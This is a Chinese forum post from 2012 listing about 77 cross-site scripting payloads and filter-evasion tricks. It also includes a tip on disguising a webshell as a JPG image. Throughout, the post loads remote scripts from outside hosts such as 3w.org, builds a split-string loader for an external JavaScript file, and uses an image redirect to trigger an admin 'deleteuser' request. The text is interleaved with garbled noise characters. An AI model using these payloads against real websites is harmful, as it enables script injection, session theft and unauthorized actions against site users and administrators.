跨站图片shell* M4 |0 l" y7 J$ h
XSS跨站代码 <script>alert("")</script>
" g M" B7 U! V9 A6 ]" L x
6 j4 Q; i- S8 L3 B将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马3 a5 ^6 J2 w- p
; b* b6 `; B2 v+ m) a% e
7 r, z# P. T" {. r4 E* W
9 p# o0 S. X# M0 }' Q0 X: f1)普通的XSS JavaScript注入 P& B+ M+ H. @, i7 d N
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 D4 W7 B8 F, c) V( V6 f$ E) X2 e6 ]4 E# i! |, E/ Y
(2)IMG标签XSS使用JavaScript命令
' \5 J6 r" G, d4 I. v<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
m0 q9 L- G, f" F' J) A; E2 p) \( U/ x( _) u; v
(3)IMG标签无分号无引号9 z- H/ Z7 \8 s; y$ _' ^
<IMG SRC=javascript:alert(‘XSS’)>
. T1 I( |7 D2 L1 t0 u! o5 }4 t3 t( v F0 c
(4)IMG标签大小写不敏感
! ^' W1 T( A3 |<IMG SRC=JaVaScRiPt:alert(‘XSS’)>$ p0 X0 F( o+ j7 o4 @1 r
' U- y% ]9 A. ~+ u; Z6 Y(5)HTML编码(必须有分号)7 r) A7 N2 P8 P& L2 }7 q- ^
<IMG SRC=javascript:alert(“XSS”)>% J& m' E2 x: }- x, a
. Y* e9 q7 \! Q5 c/ X! ~
(6)修正缺陷IMG标签
: n+ T6 W7 G, I0 S0 a; `# c- R9 @9 T<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>, b3 T1 Y+ l# ^" W7 Q
9 ^' u) z/ H% Z+ ]* O* }1 N& K! X(7)formCharCode标签(计算器)( {% U( i9 l6 o: n3 ? B3 R( d
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>7 c& G, r$ x1 ?5 Z) u: g
/ P+ }$ F2 n$ O% t" h! N(8)UTF-8的Unicode编码(计算器)& c# l, \3 B. u3 t/ Z4 c/ }
<IMG SRC=jav..省略..S')>
! J- t) @- i/ N( d/ F2 A1 f
0 I- t1 l. A( ?5 q. d* [(9)7位的UTF-8的Unicode编码是没有分号的(计算器)- s2 n+ U3 F& t) Z) o/ x7 M
<IMG SRC=jav..省略..S')>
& k; ^# c9 `" E) I
+ A' U3 j# |" B2 p% X1 w7 b9 \(10)十六进制编码也是没有分号(计算器)5 ^% x7 ~3 o3 y! e1 H5 m
<IMG SRC=java..省略..XSS')>
% K: s5 ~' c0 t1 w1 M% X$ Q/ Q( v4 ]( v# l
(11)嵌入式标签,将Javascript分开& v/ c- w) {4 d7 H
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 j6 o- x' c4 M
. }/ l6 O: J* @7 h(12)嵌入式编码标签,将Javascript分开
+ X. s2 Z) A& A [( e<IMG SRC=”jav ascript:alert(‘XSS’);”> H y# ?% L" ~) n
( U; v& O" F3 k* i0 O
(13)嵌入式换行符) j* ]6 O8 E4 v0 E; T( `9 d) `3 ]
<IMG SRC=”jav ascript:alert(‘XSS’);”>
. C, W2 J; a( u; B/ v/ Y( A2 D$ a6 o- Q- L- ~& F- o/ Q9 R9 d1 q* o- \
(14)嵌入式回车
) C: U3 T% [7 |5 C- @<IMG SRC=”jav ascript:alert(‘XSS’);”>! Z( ~3 g6 A. A; A( Z
$ r# o4 j }+ m+ ](15)嵌入式多行注入JavaScript,这是XSS极端的例子3 n3 ?; D/ C' Z" ~
<IMG SRC=”javascript:alert(‘XSS‘)”>% ^0 i: {' v4 M7 T% r' \
4 }! F8 _2 @4 n& Z N; @7 h/ x
(16)解决限制字符(要求同页面)
# I' o8 v1 ?( a! @5 E3 ]& x. }<script>z=’document.’</script>% R$ h; a I0 c0 N- ~& r! i
<script>z=z+’write(“‘</script>
/ V/ [7 e" ~! }<script>z=z+’<script’</script>0 s6 }" t3 U, R( o0 E
<script>z=z+’ src=ht’</script>
$ P7 H) B' g |<script>z=z+’tp://ww’</script>
$ p- @( e I9 T<script>z=z+’w.shell’</script>: ]6 z- \' k- r/ |
<script>z=z+’.net/1.’</script>: ?! y, H4 i+ @! S3 z E" m7 _9 M
<script>z=z+’js></sc’</script>
' r4 s* |7 c' M: `# b. a0 p/ z<script>z=z+’ript>”)’</script>: ^! o9 O) ?4 s* `1 O- e, S3 }
<script>eval_r(z)</script>
8 S) o8 i, q) @1 \5 ?
' Q. j/ n/ r# C4 P(17)空字符 ~! H- `0 J1 ^/ Y- d
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
& w8 f9 V! c3 y1 s, d" B! \" T x. T' m% q8 v
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
4 ^( C1 F) O5 q3 f4 hperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out3 |6 C# z) Z! @" ]7 ~& Z& L
/ f9 n: ~* m1 U2 ~7 f7 N ?1 g
(19)Spaces和meta前的IMG标签5 d# S: F% [! Z" M9 ~& o) a) w: f0 J
<IMG SRC=” javascript:alert(‘XSS’);”>1 L4 @5 j$ j! h" h* i
2 J% k [0 o* m4 J8 x( `9 U(20)Non-alpha-non-digit XSS
3 `4 L, b: L9 d<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>; @, f, K+ A8 b9 W6 \
. ^4 k6 x. W$ x" I0 u(21)Non-alpha-non-digit XSS to 2
5 [* y6 m: ]7 ?2 C- f<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
V, a8 B# y/ X- ~' R
8 P: Y! Z8 q4 v4 s(22)Non-alpha-non-digit XSS to 3
* q5 Z( P) F, D8 q |" a0 K<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>, ~ a2 U. m7 X6 ^
0 y; ^$ P% [- Y8 |* @, K
(23)双开括号
% Z3 ]$ c8 m1 d& N: ~: p9 I<<SCRIPT>alert(“XSS”);//<</SCRIPT> S1 D* d* o, m' s
# S1 v& q" ]( k# C. I/ {(24)无结束脚本标记(仅火狐等浏览器)
9 p, V# R. G+ [7 N( r e! J0 W# H<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>$ W7 v' ^5 \; X; w3 ~0 ?! j# u( L* @
/ ?; g) v) U0 b
(25)无结束脚本标记2 f" W' ]; k; y. J* S0 L
<SCRIPT SRC=//3w.org/XSS/xss.js>' N, N& x ~, x$ R* z+ f
4 b; X' { @/ y& D
(26)半开的HTML/JavaScript XSS* v# I t% @ Y9 c3 Y: v. a% R* o8 z
<IMG SRC=”javascript:alert(‘XSS’)”
' l+ i6 R4 c% x! t
) s: K/ r7 L4 d! x(27)双开角括号
# f, N1 G) O4 x* f9 f$ `1 ~' I<iframe src=http://3w.org/XSS.html <
- {0 l! }; y5 C1 c" o- Z, |0 S h8 p7 s& u3 N
(28)无单引号 双引号 分号
$ j4 Q5 l0 G+ E8 k' ]8 `<SCRIPT>a=/XSS/. [( B9 Q/ T& l g" r. `
alert(a.source)</SCRIPT>& C: M+ @' }( ]5 y E
6 Q: O! I! {: v# U) ^) R' u
(29)换码过滤的JavaScript2 e' D: E7 W% i3 ]% V
\”;alert(‘XSS’);//, k% @ |! q) |' @
n0 i; Q6 G: c9 e T(30)结束Title标签
: O+ V: R, Z: H6 T4 e- ^</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
6 e' M4 |' U. d! ^' S! ]# s) `( R0 t! f
(31)Input Image: E! I2 e7 Y. M3 j1 o& O: H0 k
<INPUT SRC=”javascript:alert(‘XSS’);”>) } C$ D" {0 C4 _2 m2 `5 Q A
7 o& M( Y6 ~; G' U6 e) W% V. l
(32)BODY Image
; m- f6 O8 G6 [" R$ N<BODY BACKGROUND=”javascript:alert(‘XSS’)”># A# w4 ]0 N+ b5 H
2 T5 H' Z; L% W5 u4 t(33)BODY标签
& P% A/ z# }9 m$ B+ G* f<BODY(‘XSS’)>! \$ T) Y' W' n
0 y3 ~: I- o0 { @(34)IMG Dynsrc
* O; F6 _" o+ d6 [4 i<IMG DYNSRC=”javascript:alert(‘XSS’)”>: [. p1 M0 s5 V* J
9 |, m) b! N1 ]: f& a, L. R9 M
(35)IMG Lowsrc
8 J9 h) z) C7 i' O1 l% x4 ^* \% U<IMG LOWSRC=”javascript:alert(‘XSS’)”>
- g j1 P7 U( G
* v- m' y! d; b5 v(36)BGSOUND
w. ~% l, ?, D6 q; e<BGSOUND SRC=”javascript:alert(‘XSS’);”>
5 f! v2 H! ~4 r d) l+ @3 e) `8 E4 D( S; M5 ^
(37)STYLE sheet& Y+ E9 D- ~ J, z4 }) f7 t; v( y
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>5 s7 f6 k3 ]8 [6 X# L& }" D" P
h9 L; }. E. g: V7 C8 M% @/ h
(38)远程样式表# `8 k3 ~5 f7 v: Y* o6 x; ~7 t
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
( q/ ~7 U" C: U1 z4 g
- H$ P( `' U+ N3 U(39)List-style-image(列表式)& S' ^% O; m; Y5 p+ r2 j _$ J
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- g7 T2 c4 A+ K! G' _- x! q7 V- n4 b# v+ j/ t" h
(40)IMG VBscript8 z' F3 R( o3 b; z
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS1 z" L7 s( L- ~) w1 }/ y
" u* o2 k2 R+ l) B(41)META链接url8 T5 o) W# P7 Q0 B$ b
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
' m" z) O+ ^ @4 b$ Q8 y H# S% Q2 O' _3 y0 G4 b& H
(42)Iframe8 u$ ?8 k7 r2 B5 n- B! l
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>, q# D8 u8 D6 y) C
(43)Frame
5 e J K5 `4 i7 y<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
( |! e; C; I* q% Z; A( w" P1 m" Z% m2 l
(44)Table3 s& R1 H( B4 r% e
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>, I5 l8 ?* D% |2 `& B! g: @
0 i. f) K2 K' h& U- X0 n" A(45)TD* _) l! q/ \2 O: q3 s7 O3 o, g
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
$ n" ]" F: k @. h
* U! P1 A X# @4 x- n(46)DIV background-image
0 L& M( Z# A5 p/ y3 `7 \8 V$ t, I<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>, e& i2 X- W; R# }3 I2 g
& E8 t1 y3 M, W$ Z$ D* u3 T
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279); i# g6 V/ `9 [. u$ K8 _( M
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>! n2 F' ]( B' ^6 z$ X( n/ ^
' N) o1 o6 p# ^4 x6 S% e& [" H(48)DIV expression
+ |+ h8 l1 [( ^4 H( [<DIV STYLE=”width: expression_r(alert(‘XSS’));”>' P$ {, h& ?3 r' m1 p+ ~
9 R! S5 o- k& Q" t
(49)STYLE属性分拆表达! ^' ?5 d, R0 q m x+ j& Y# q3 C
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
) l! \9 {; Q& g2 a2 f# O4 A, O) [0 L! p0 c, I! _/ c* s
(50)匿名STYLE(组成:开角号和一个字母开头)
- _8 b# j5 C# i. k<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
. L( h/ U1 {6 q4 n0 _! o8 c4 F# I6 S3 I
(51)STYLE background-image
' Z& |$ {: C) \- @' G8 B1 ]<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>$ c2 w4 X/ p m$ \+ p9 l) d
0 q$ V% W. _7 T9 X(52)IMG STYLE方式
) _) P `3 F- ^+ E( ^. oexppression(alert(“XSS”))’>
/ ?/ e# G# t; A' X9 V
: b1 P5 b6 A2 `) i. d0 O(53)STYLE background
/ D' U5 O5 Y% b<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
}9 z4 O4 X! {" n
9 j! D8 u0 k" s, q, V(54)BASE, D- h. c' e: H& O! L* ]+ m
<BASE HREF=”javascript:alert(‘XSS’);//”>
# U' X g( h. o2 ?3 V) y
$ m& W2 S0 J% P _: `( B4 A; G! U0 |(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS$ z% u4 \& X/ s( I+ s5 }% C0 j% B2 s9 m: v
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
8 }9 A" s0 Y% L; x
# m0 p2 E, h4 w( d$ K/ G6 N(56)在flash中使用ActionScrpt可以混进你XSS的代码$ K* k/ |7 f0 b* ^0 Z. X
a=”get”;
9 K* a# `& b# J1 u1 l! x( _b=”URL(\”";
( E3 F$ Y- M. z/ d* B3 G* Pc=”javascript:”;
P: [2 L: d! A, u8 H* a4 W8 Q! b' Cd=”alert(‘XSS’);\”)”;
, x ]: h% ]! O6 Ieval_r(a+b+c+d);
t: f1 h- d; Z) d. |* U! X6 a
* f4 i% g+ R. H1 G9 O& [# j) P(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上% z8 m+ A) e" ?1 g! c
<HTML xmlns:xss>
" v$ k1 g6 e$ q( N' J8 S<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>0 O: r, D1 ~) t% r( E
<xss:xss>XSS</xss:xss>
) ]. B% [$ H* ]8 i% E' z" @</HTML>
. I0 \ l1 T: [0 s, B
8 v* J' q) S5 C* b6 J5 ?- B/ ](58)如果过滤了你的JS你可以在图片里添加JS代码来利用
0 ^( }. p( f! N% `<SCRIPT SRC=””></SCRIPT>
" M9 k% C! @$ M, h$ _: N9 N
; e4 q2 H8 \+ X(59)IMG嵌入式命令,可执行任意命令. M8 Q2 n% g) c0 D1 q: k
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
' u) n7 t2 x, S& n2 f i
9 N. ]7 ^; B- y; u }(60)IMG嵌入式命令(a.jpg在同服务器)
8 Z2 d! E6 M* O. \+ E. B6 p$ }Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
" Z$ b M( q3 x! Y9 r! W2 a6 c/ v+ p* }8 p( p0 M4 J% M
(61)绕符号过滤& ^) n7 y0 F8 o# c
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 O5 @) n4 T& [/ `" C7 v( O
+ M( N5 i- t4 K0 c3 o(62)( s/ s. P) K; r, e8 J8 ^
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
3 x) k3 P% D( ?' {) t' h
: F3 v( R- N2 v9 q: g& C" U T(63)$ V3 |1 ^3 S$ ]& k8 E. y/ J9 t
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>1 f0 [- b* r) _' Y
) j9 }8 Z0 i- k, w0 \(64)
# M9 a# M. _; M( s+ Z<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
4 S# `! w. O: V9 T! V& f( k8 V& I, C% h3 ?$ s, i
(65)
" o, g& ]# N/ \0 ?7 [<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
' B8 z+ p# A3 B2 G8 i1 ~; n8 a: n5 W. y; h
(66)) [( U1 \' @, e. k! S9 w2 Z1 ~8 {
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
' w! V. K5 Q' E% B% L1 R
% y! x) V1 k7 O& T(67)0 }2 m& a( e+ N( ], n! Q
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
, V9 h5 A7 W, T- y
& j3 \: v p% h- p(68)URL绕行
1 N" e1 g5 W% K2 m" ?4 \<A HREF=”http://127.0.0.1/”>XSS</A>
3 r3 ]! T9 \1 f5 I+ D. X) F1 q, Y# O) z! c
(69)URL编码
% E0 ^) N7 y8 Q9 j1 |<A HREF=”http://3w.org”>XSS</A>" E9 E2 F) X; b. t }, i5 a
6 S; Y$ ~) i; G7 Z
(70)IP十进制5 r, ]2 Q7 D: E: }- [
<A HREF=”http://3232235521″>XSS</A>
! a7 d7 k+ n3 g6 X$ V
0 i3 x* y. D9 E$ H( x+ s( u8 \(71)IP十六进制
! `) [+ w9 s% v! A# P<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
' P' v8 X! D% x! V) c4 C" p
, `6 z8 P$ F8 F; ~6 e(72)IP八进制* Q2 ?9 b4 Y7 q" q3 ~: D$ `* ~& m
<A HREF=”http://0300.0250.0000.0001″>XSS</A>1 z' g: k( t; u. K0 k
' }/ ?( ]0 q' s5 t+ X3 r) g! _
(73)混合编码/ h3 N" ?& f+ {( F( k4 |7 g( f& O
<A HREF=”h% s5 d$ d/ y' Q. V" z
tt p://6 6.000146.0×7.147/”">XSS</A>
$ o5 X0 U8 ]0 q9 k) ?) E$ I5 A9 P' [) k
(74)节省[http:]$ k {( ]. X( F
<A HREF=”//www.google.com/”>XSS</A>1 [4 g, L& j# {: `( X, s1 D
. t, ^: [% G. z, v* e
(75)节省[www]
! F- A- J1 l8 y! B- V<A HREF=”http://google.com/”>XSS</A>
" C2 {: w. b5 Z6 R1 g. s/ F0 Q. t7 O4 N; m! s: F" v5 C% `* u
(76)绝对点绝对DNS
w+ N" K7 D/ q' T1 o6 b<A HREF=”http://www.google.com./”>XSS</A>
7 I$ `) y1 O$ Z# g3 D' K
Y: w( w7 U- M$ ^1 ~; X(77)javascript链接
8 ?% ^0 Z& ` ~) y' V! G<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> y7 ?$ ~& B, e. E
|
发表于 2012-9-13 17:04:56
收藏
支持
反对